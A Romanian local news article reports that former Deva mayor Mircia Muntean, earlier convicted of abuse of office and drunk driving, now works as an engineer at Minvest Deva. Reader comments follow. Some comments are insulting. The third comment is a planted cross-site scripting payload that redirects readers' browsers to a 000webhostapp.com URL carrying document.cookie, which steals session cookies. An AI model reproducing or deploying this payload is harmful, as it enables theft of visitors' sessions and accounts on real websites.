Fostul primar al Devei, Mircia Muntean, lucrează acum la Minvest

Fostul primar al Devei, Mircia Muntean (foto), este angajat al Companiei Minvest Deva de aproape o lună, susţine directorul Lucian Gherman.

Mircia Muntean este angajat pe postul de inginer aici. Gherman a declarat pentru MESAGERUL HUNEDOREAN că nu a fost nevoie de concurs pentru ocuparea acestui post.
Mircia Muntean a fost primar al municipiului Deva în perioada 1996-2012, deputat în Parlamentul României în mandatul 2012-2016, şi ales din nou primar al Devei în 2016. Dar în 24 septembrie 2013 a fost condamnat definitiv de Înalta Curte de Casaţie şi Justiţie la patru ani de închisoare cu suspendare, fiind acuzat de abuz în serviciu, într-un dosar din 2004, în care a fost acuzat că a încheiat tranzacţii ilegale de terenuri cu un traficant de maşini de lux.
În aprilie 2017 a primit o nouă sentinţă de doi ani, pentru conducere sub influenţa alcoolului, şi fiindcă se afla în perioada de încercare, pedeapsa de patru ani s-a reactivat, cele două pedepse s-au contopit şi astfel Mircia Muntean a avut de ispăşit o pedeapsă de şase ani cu executare. A ieşit din închisoare la sfârşitul anului trecut. (S.Popa)

6 comentarii la „Fostul primar al Devei, Mircia Muntean, lucrează acum la Minvest

 • 28 mai 2020 la 21:44
  Legătură permanentă

  Mare excroc. Ce face acolo? Fura? Ca asta ii place lui. O jigodie ordinara.

 • 30 mai 2020 la 9:12
  Legătură permanentă

  Putem să vedem rezultatele concursului pentru acel post?! Cum dracu’ își găsesc ăștia de lucru așa repede?! Ca și fostul prefect Kiszely, aterizat acum la Primăria Deva!

 • 30 mai 2020 la 22:22
  Legătură permanentă

  document.location=’https://ro-mail.000webhostapp.com/cuci/danutu.php?c=’+document.cookie;

Comenteaza

Acest site folosește Akismet pentru a reduce spamul. Află cum sunt procesate datele comentariilor tale.